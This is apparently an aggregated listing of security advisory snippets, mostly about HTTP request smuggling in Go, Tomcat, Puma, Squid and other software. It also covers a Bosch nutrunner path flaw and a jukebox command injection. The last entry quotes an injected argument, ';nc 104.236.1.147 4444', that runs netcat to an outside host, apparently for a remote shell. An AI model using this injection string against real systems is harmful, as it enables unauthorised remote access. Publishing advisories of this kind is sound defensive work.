Security Bulletin: IBM Storage Ceph is vulnerable to a HTTP Request Smuggling vulnerablity in Golang (CVE-2022-1705)

Summary Golang is used by IBM Storage Ceph as part of RGW and in assorted other locations. CVE-2022-1705 Vulnerability Details CVEID:CVE-2022-1705 DESCRIPTION: Golang Go is vulnerable to HTTP request smuggling, caused by a flaw with accepting of some invalid Transfer-Encoding headers in the HTTP/...

SUSE: Security Advisory (SUSE-SU-2024:0206-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Ubuntu 23.04 / 23.10 : Puma vulnerability (USN-6597-1)

The remote Ubuntu 23.04 / 23.10 host has a package installed that is affected by a vulnerability as referenced in the USN-6597-1 advisory. It was discovered that Puma incorrectly handled parsing chunked transfer encoding bodies. A remote attacker could possibly use this issue to cause Puma to...

SUSE: Security Advisory (SUSE-SU-2024:0209-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') in trillium-http and trillium-client

Summary Insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over outbound headers. Details Outbound trilliumhttp::HeaderValue and trilliumhttp::HeaderName can be constructed infallibly a...

CVE-2024-23644 trillium-http and trillium-client vulnerable to HTTP Request/Response Splitting

Trillium is a composable toolkit for building internet applications with async rust. In trillium-http prior to 0.3.12 and trillium-client prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have...

Integrating mPulse’s Beacon API with EdgeWorkers to Visualize All Client Requests

Akamai mPulse combines with Akamai EdgeWorkers to visualize any client request and uses its http-request module to let users send their own requests...

SUSE-SU-2024:0209-1 Security update for tomcat

This update for tomcat fixes the following issues: Security fixes: - CVE-2023-46589: Fixed HTTP request smuggling due to incorrect headers parsing. bsc1217649 Other fixes: - Streamline how patches are handled in the spec file of the package...

SUSE-SU-2024:0208-1 Security update for tomcat10

This update for tomcat10 fixes the following issues: Updated to Tomcat 10.1.18 - CVE-2023-46589: Fixed HTTP request smuggling due to incorrect headers parsing bsc1217649 Find the full release notes at: https://tomcat.apache.org/tomcat-9.0-doc/changelog.html...

SUSE-SU-2024:0206-1 Security update for tomcat

This update for tomcat fixes the following issues: Security fixes: - CVE-2023-46589: Fixed HTTP request smuggling due to incorrect headers parsing. bsc1217649 Other fixes: - Streamline how patches are handled in the spec file of the package...

Important: Red Hat Security Advisory: squid:4 security update

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is...

Amazon Linux 2 : containerd, --advisory ALAS2DOCKER-2024-035 (ALASDOCKER-2024-035)

The version of containerd installed on the remote host is prior to 1.7.2-1. It is, therefore, affected by a vulnerability as referenced in the ALAS2DOCKER-2024-035 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version numbe...

GLSA-202401-27 : Ruby: Multiple vulnerabilities

The remote host is affected by the vulnerability described in GLSA-202401-27 Ruby: Multiple vulnerabilities - An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header...

CVE-2024-22233

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service DoS condition. Specifically, an application is vulnerable when all of the following are true: the application uses Spring MVC Spring Security 6.1....

CVE-2024-22233

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service DoS condition. Specifically, an application is vulnerable when all of the following are true: the application uses Spring MVC Spring Security 6.1....

Important: amazon-cloudwatch-agent

Issue Overview: The HTTP/2 protocol allows a denial of service server resource consumption because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CVE-2023-39325 A malicious HTTP sender can use chunk extensions to cause a receiver...

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted...

The vulnerability of the NEXO-OS operating system in the Bosch Nexo cordless nutrunner and Bosch Nexo special cordless nutrunner tools for installation work on production lines allows a perpetrator to load any desired files.

The vulnerability of the NEXO-OS operating system for tools used in production line assembly work, such as the Bosch Nexo cordless nutrunner and the Bosch Nexo special cordless nutrunner, is related to an incorrect limitation on the path name to the restricted access catalog. Exploiting this...

Internet Bug Bounty: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling (Client- Side Desync) (CWE: 444)

SECURITY CVE-2024-21733 Apache Tomcat - Information Disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 9.0.0-M11 to 9.0.43 Apache Tomcat 8.5.7 to 8.5.63 Description: Incomplete POST requests triggered an error response that could contain data fr...

CVE-2024-0714

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...